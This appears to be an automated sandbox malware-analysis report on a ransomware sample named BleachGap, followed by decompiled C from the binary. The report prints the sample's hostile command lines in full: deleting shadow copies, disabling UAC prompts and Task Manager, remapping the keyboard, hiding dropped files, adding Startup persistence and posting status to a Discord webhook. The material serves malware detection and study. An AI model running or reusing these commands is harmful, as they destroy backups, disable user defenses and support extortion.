BatToExe compiled binary, Source: 00000014.00000002.224657271.00000232B7A17000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000014.00000002.224620941.00000232B79D6000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000014.00000003.224251756.00000232B7A16000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: vssadmin.exe PID: 2436 Parent PID: 4180

General

Start time:	00:28:08
Start date:	15/02/2021
Path:	C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):	false
Commandline:	vssadmin delete shadows /all /quiet
Imagebase:	0x7ff68bfa0000
File size:	145920 bytes
MD5 hash:	47D51216EF45075B5F7EAA117CC70E40
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000015.00000002.228657668.000002264DB20000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000015.00000002.228672912.000002264DB28000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000015.00000002.228650813.000002264DAF0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000015.00000002.228739807.000002264DD60000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000015.00000002.228747289.000002264DD64000.00000004.00000040.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: reg.exe PID: 5624 Parent PID: 4180

General

Start time:	00:28:09
Start date:	15/02/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f
Imagebase:	0x7ff65c730000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000016.00000002.229538128.0000021CA1C14000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000016.00000002.229530102.0000021CA1C10000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000016.00000002.231285225.0000021CA1E10000.00000004.00000020.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: reg.exe PID: 4944 Parent PID: 4180

General

Start time:	00:28:11
Start date:	15/02/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /f
Imagebase:	0x7ff65c730000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000017.00000002.232578649.00000291A8090000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000017.00000002.233263410.00000291A8424000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000017.00000002.233220564.00000291A8420000.00000004.00000040.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: reg.exe PID: 5472 Parent PID: 4180

General

Start time:	00:28:12
Start date:	15/02/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'EnableLUA' /t REG_DWORD /d '1' /f
Imagebase:	0x7ff65c730000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000018.00000002.235387887.000002154B140000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000018.00000002.235350187.000002154B000000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000018.00000002.235395727.000002154B144000.00000004.00000040.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: reg.exe PID: 5936 Parent PID: 4180

General

Start time:	00:28:13
Start date:	15/02/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64
Imagebase:	0x7ff65c730000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000001A.00000002.237073796.000001F542870000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000001A.00000002.237108856.000001F5429B0000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000001A.00000002.237124909.000001F5429B4000.00000004.00000040.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: reg.exe PID: 4816 Parent PID: 4180

General

Start time:	00:28:14
Start date:	15/02/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System' /v 'DisableTaskMgr' /t REG_DWORD /d '1' /f
Imagebase:	0x7ff65c730000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000001B.00000002.238957668.000002084EBE0000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000001B.00000002.239006253.000002084EDC4000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000001B.00000002.238995782.000002084EDC0000.00000004.00000040.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: reg.exe PID: 5472 Parent PID: 4180

General

Start time:	00:28:15
Start date:	15/02/2021
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG ADD 'HKCU\Control Panel\Mouse' /v SwapMouseButtons /t REG_SZ /d '1' /f
Imagebase:	0x7ff65c730000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000001D.00000002.242656801.0000021C508D4000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000001D.00000002.242662946.0000021C508E0000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 0000001D.00000002.242643116.0000021C508D0000.00000004.00000040.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: attrib.exe PID: 6156 Parent PID: 4180

General

Start time:	00:28:17
Start date:	15/02/2021
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r +s +h +a +i 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe'
Imagebase:	0x7ff70ef10000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: attrib.exe PID: 6184 Parent PID: 4180

General

Start time:	00:28:17
Start date:	15/02/2021
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe'
Imagebase:	0x7ff70ef10000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: attrib.exe PID: 6212 Parent PID: 4180

General

Start time:	00:28:17
Start date:	15/02/2021
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe'
Imagebase:	0x7ff70ef10000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: DiscordSendWebhook.exe PID: 6260 Parent PID: 4180

General

Start time:	00:28:18
Start date:	15/02/2021
Path:	C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
Imagebase:	0x140000
File size:	988672 bytes
MD5 hash:	FB7A78F485EC2586C54D60D293DD5352
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DiscordSendWebhookTool, Description: Yara detected DiscordSendWebhook Tool, Source: 00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_DiscordSendWebhookTool, Description: Yara detected DiscordSendWebhook Tool, Source: 00000022.00000003.250316989.0000000000AE2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_DiscordSendWebhookTool, Description: Yara detected DiscordSendWebhook Tool, Source: 00000022.00000003.250284851.0000000000AE2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_DiscordSendWebhookTool, Description: Yara detected DiscordSendWebhook Tool, Source: 00000022.00000003.249588574.0000000000BFD000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000022.00000002.250933814.00000000017D0000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000022.00000002.250648318.0000000000A80000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_DiscordSendWebhookTool, Description: Yara detected DiscordSendWebhook Tool, Source: 00000022.00000002.250683901.0000000000AE2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000022.00000002.250579104.00000000003A0000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_DiscordSendWebhookTool, Description: Yara detected DiscordSendWebhook Tool, Source: 00000022.00000003.250235856.0000000000AE2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000022.00000002.250655924.0000000000A89000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_DiscordSendWebhookTool, Description: Yara detected DiscordSendWebhook Tool, Source: 00000022.00000003.250211441.0000000000AE2000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 8%, Metadefender, Browse Detection: 8%, ReversingLabs

Chronological Activities

Analysis Process: powershell.exe PID: 6576 Parent PID: 4180

General

Start time:	00:28:32
Start date:	15/02/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell start -verb runas cmd.exe /ArgumentList '/c kill.bat' /filepath 'C:\Users\user\AppData\Local\Temp' /WindowStyle hidden
Imagebase:	0x7ff650b80000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000025.00000002.291791173.0000028CAE874000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000025.00000003.290262642.0000028CC8801000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000025.00000002.292108463.0000028CAE923000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000025.00000003.283432554.0000028CC8A25000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000025.00000002.291773118.0000028CAE870000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000025.00000002.292271084.0000028CAE949000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000025.00000002.306884834.0000028CC8801000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000025.00000002.307142020.0000028CC8A20000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BatToExe, Description: Yara detected BatToExe compiled binary, Source: 00000025.00000002.292313796.0000028CAE952000.00000004.00000020.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: BleachGap.exe PID: 3292 Parent PID: 5616 BleachGap.exeCOMMON

Executed Functions

Function 0040A6F6, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040A6F6(void* __eflags, intOrPtr _a4) {
				_Unknown_base(*)()* _t9;
				signed int _t11;
				signed int _t12;
				void* _t13;
				WCHAR* _t14;
				struct HINSTANCE__* _t17;

				_t14 = E0040E200(0x104, _a4);
				_t12 = GetTempPathW(0x104, _t14);
				_t17 = LoadLibraryW(L"Kernel32.DLL");
				if(_t17 != 0) {
					_t9 = GetProcAddress(_t17, "GetLongPathNameW");
					if(_t9 != 0) {
						_t11 =  *_t9(_t14, _t14, 0x104); // executed
						_t12 = _t11;
					}
					FreeLibrary(_t17);
				}
				E0040E350(_t13, 0x104 - _t12);
				_t14[_t12] = 0;
				return 0;
			}

0x0040a709
0x0040a718
0x0040a720
0x0040a724
0x0040a72c
0x0040a734
0x0040a739
0x0040a73b
0x0040a73b
0x0040a73e
0x0040a73e
0x0040a747
0x0040a74e
0x0040a756

APIs

Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E20C
Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(02790000,00000000,?,?), ref: 0040E267

GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A70D
LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A71A
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A72C
GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A739
FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A73E

Strings

GetLongPathNameW, xrefs: 0040A726
Kernel32.DLL, xrefs: 0040A713

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
String ID: GetLongPathNameW$Kernel32.DLL
API String ID: 1993255246-2943376620
Opcode ID: d718137a791e701f6bd57810b192c1db4f572494fd9ecd74e792e9dadcbe4658
Instruction ID: 764606bb569eff9aa2a854e4b0558f5753b22c8873abefb13c435e0df7790d1f
Opcode Fuzzy Hash: d718137a791e701f6bd57810b192c1db4f572494fd9ecd74e792e9dadcbe4658
Instruction Fuzzy Hash: B4F0E9322012147FC2102BB6AC4CEEB3E6CDF95755701443AF904E2251DB69CC20C2BD

Uniqueness

Uniqueness Score: -1.00%

Function 004098D0, Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E004098D0(_Unknown_base(*)()* _a4) {
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;

				 *0x4170e8 = _a4;
				_a4 = E00409890;
				_t6 = _a4;
				if(_t6 == 0) {
					_t7 = SetUnhandledExceptionFilter( *0x4170f0);
					 *0x4170f0 = 0;
					return _t7;
				} else {
					if( *0x4170f0 != 0) {
						_a4 = _t6;
						return SetUnhandledExceptionFilter(??);
					}
					_t8 = SetUnhandledExceptionFilter(_t6); // executed
					 *0x4170f0 = _t8;
					return _t8;
				}
			}

0x004098d4
0x004098d9
0x004099f0
0x004099f6
0x00409a20
0x00409a26
0x00409a30
0x004099f8
0x004099ff
0x00409a01
0x00409a05
0x00409a05
0x00409a0c
0x00409a12
0x00409a17
0x00409a17

APIs

SetUnhandledExceptionFilter.KERNELBASE(00409890,0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008), ref: 00409A0C
SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008,00000008), ref: 00409A20

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8b0f608e405cae46fc8e63b589dbaca7258740b989b39933334343d4a09fb59f
Instruction ID: 2c8fa190a6d032f87ec30cf03d38c93985f91324802676e59826f832aed0a575
Opcode Fuzzy Hash: 8b0f608e405cae46fc8e63b589dbaca7258740b989b39933334343d4a09fb59f
Instruction Fuzzy Hash: 38E0E5B0208341EFC710CF18E948B867BF5B788701F01C43AE445922A5E7348C44EF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040195B, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040195B(char __edx) {
				intOrPtr _v12;
				char _v16;
				signed int _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				char _v40;
				WCHAR* _v52;
				WCHAR* _v76;
				WCHAR* _v100;
				intOrPtr _v116;
				void* _t28;
				void* _t29;
				void* _t35;
				void* _t36;
				void* _t44;
				void* _t45;
				void* _t54;
				void* _t55;
				void* _t63;
				void* _t68;
				char* _t72;
				void* _t74;
				void* _t75;
				void* _t79;
				char _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t97;
				void* _t100;
				intOrPtr* _t101;

				_t86 = __edx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0040DF60();
				 *0x41702c = 0x416107;
				_v28 = 0;
				while(1) {
					_t103 = 3 - _v28;
					if(3 < _v28) {
						break;
					}
					_t72 =  *0x41702c; // 0x41609a
					_v24 =  *_t72;
					 *0x41702c =  *0x41702c + 1;
					_t74 = E0040DE20();
					_t97 = _t86;
					_push(_t74);
					_push(_t97);
					_t75 = E0040DE20();
					E00405D60(_t103, _v24 * 0xffffffff);
					E0040DE60( &_v28, _t75);
					_push(_v32);
					_t79 = E0040DE20();
					_pop(_t100);
					E0040DFC0(_t100);
					_t86 = _v40;
					E0040DFC0(_t86);
					E0040DE60( &_v40, _t79);
					 *_t101 =  *_t101 + 1;
					_t104 =  *_t101;
					if( *_t101 >= 0) {
						continue;
					}
					break;
				}
				_v16 = E00409B40(0x400);
				_t28 = E0040DE20();
				_t87 = _t86;
				_push(_t28);
				_t29 = E0040DE20();
				_t88 = _t87;
				E0040A6F6(_t104, _t29);
				_push( &_v16);
				E0040DE60();
				GetTempFileNameW(_v24, 0x416020, 0, _v28); // executed
				_t35 = E0040DE20();
				_t89 = _t88;
				_push(_t35);
				_t36 = E0040DE20();
				_t90 = _t89;
				E00409B60(_v28, _t36);
				_push(0x417070);
				E0040DE60();
				E0040A787( *0x417070);
				E0040A665( *0x417070); // executed
				GetTempFileNameW( *0x417070, 0x416020, 0, _v52); // executed
				_t44 = E0040DE20();
				_t91 = _t90;
				_push(_t44);
				_t45 = E0040DE20();
				_t92 = _t91;
				E00409B60(_v52, _t45);
				_push(0x417024);
				E0040DE60();
				E0040A787( *0x417024);
				E0040A665( *0x417024); // executed
				GetTempFileNameW( *0x417024, 0x416020, 0, _v76); // executed
				PathAddBackslashW( *0x417024);
				_t54 = E0040DE20();
				_t93 = _t92;
				_push(_t54);
				_t55 = E0040DE20();
				_t94 = _t93;
				E00409B60(_v76, _t55);
				_push(0x417038);
				E0040DE60();
				E0040A787( *0x417038);
				PathRenameExtensionW( *0x417038, _v100);
				GetTempFileNameW( *0x417024, 0x416020, 0, _v100); // executed
				_t63 = E0040DE20();
				_t95 = _t94;
				_push(_t63);
				E00409B60(_v100, E0040DE20());
				E0040DE60(0x417068, _t95);
				_t68 = E00409B20(_v116);
				return E0040DEF0(E0040DEF0(E0040DEF0(_t68, _v12), _v28), _v28);
			}

0x0040195b
0x0040195e
0x0040195f
0x00401960
0x00401961
0x00401962
0x00401963
0x00401964
0x0040196e
0x00401973
0x0040197c
0x00401981
0x00401984
0x00000000
0x00000000
0x00401986
0x0040198e
0x00401992
0x00401999
0x0040199e
0x0040199f
0x004019a0
0x004019a1
0x004019b0
0x004019ba
0x004019c3
0x004019c4
0x004019c9
0x004019cc
0x004019d1
0x004019d6
0x004019e0
0x004019e5
0x004019e5
0x004019e8
0x00000000
0x00000000
0x00000000
0x004019e8
0x004019f4
0x004019f9
0x004019fe
0x004019ff
0x00401a01
0x00401a06
0x00401a08
0x00401a11
0x00401a12
0x00401a2a
0x00401a30
0x00401a35
0x00401a36
0x00401a38
0x00401a3d
0x00401a43
0x00401a4e
0x00401a4f
0x00401a5a
0x00401a65
0x00401a7f
0x00401a85
0x00401a8a
0x00401a8b
0x00401a8d
0x00401a92
0x00401a98
0x00401aa3
0x00401aa4
0x00401aaf
0x00401aba
0x00401ad4
0x00401adf
0x00401ae5
0x00401aea
0x00401aeb
0x00401aed
0x00401af2
0x00401af8
0x00401b03
0x00401b04
0x00401b0f
0x00401b1e
0x00401b38
0x00401b3e
0x00401b43
0x00401b44
0x00401b51
0x00401b5d
0x00401b66
0x00401b8e

APIs

Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77

GetTempFileNameW.KERNEL32(?,00416020,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004043B9), ref: 00401A2A
GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,?,00000000,00000000,?,00416020,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A7F
GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000,?,00000000,00000000,?,00416020), ref: 00401AD4
PathAddBackslashW.SHLWAPI(00416020,00000000,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000,?,00000000,00000000,?,00416020), ref: 00401ADF
PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000), ref: 00401B1E
GetTempFileNameW.KERNEL32(00416020,00000000,00000000,?,00000000,?,00000000,00000000,00416020,00000000,00000000,00000000,?,00000000,00000000,00416020), ref: 00401B38

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02790000,00000000,?), ref: 0040DE99

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02790000,00000000,?,?), ref: 0040DEBC

Strings

`A, xrefs: 00401AC8
`A, xrefs: 00401B2C
`A, xrefs: 00401A20
`A, xrefs: 00401A73

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
String ID: `A$ `A$ `A$ `A
API String ID: 368575804-2594752929
Opcode ID: 1ba5b1041860197bcb70b5f8865f6e3a244e24124e7517cd294dd1039848c71c
Instruction ID: da94853b8b5bd26d1bd5120d1b9c906e5f4cf8f619d60ffb6644f8987c096960
Opcode Fuzzy Hash: 1ba5b1041860197bcb70b5f8865f6e3a244e24124e7517cd294dd1039848c71c
Instruction Fuzzy Hash: 6651EEB59047006ED601BBB2DD42E7F7B7EEB98318F00883FB540690E2C63D9C559A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403275, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00403275(void* __edi, void* __ebp, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				WCHAR* _v16;
				char _v24;
				WCHAR* _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _t43;
				void* _t45;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t62;
				void* _t69;
				void* _t75;
				void* _t80;
				void* _t90;
				void* _t106;
				intOrPtr _t108;
				void* _t109;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t123;
				intOrPtr _t125;
				void* _t126;
				void* _t128;
				void* _t129;
				void* _t130;

				_t129 = __ebp;
				_t128 = __edi;
				_t106 = 7;
				do {
					_t130 = _t130 - 4;
					_v8 = 0;
					_t106 = _t106 - 1;
				} while (_t106 != 0);
				E004051A0(E0040DF60(), _a36);
				E00405060(_t130, _a24);
				_t108 = _a28;
				E00405060( &_v8, _t108);
				if(E00402BC1() == 0 || E0040559A() == 0x41) {
					_t43 = 0;
				} else {
					_t43 = 1;
				}
				if(_t43 == 0) {
					_t45 = E0040DE20();
					_t109 = _t108;
					_push(_t45);
					E00406260(_t128, 0x800, E0040DE20());
					E0040DE60( &_v8, _t109);
					GetSystemDirectoryW(_v16, 0x800);
					PathAddBackslashW(_v16);
				} else {
					_t62 = E0040DE20();
					_t114 = _t108;
					_push(_t62);
					E00406260(_t128, 0x800, E0040DE20());
					E0040DE60( &_v8, _t114); // executed
					GetWindowsDirectoryW(_v16, 0x800);
					PathAddBackslashW(_v16);
					_push(_v16);
					_t69 = E0040DE20();
					_pop(_t117);
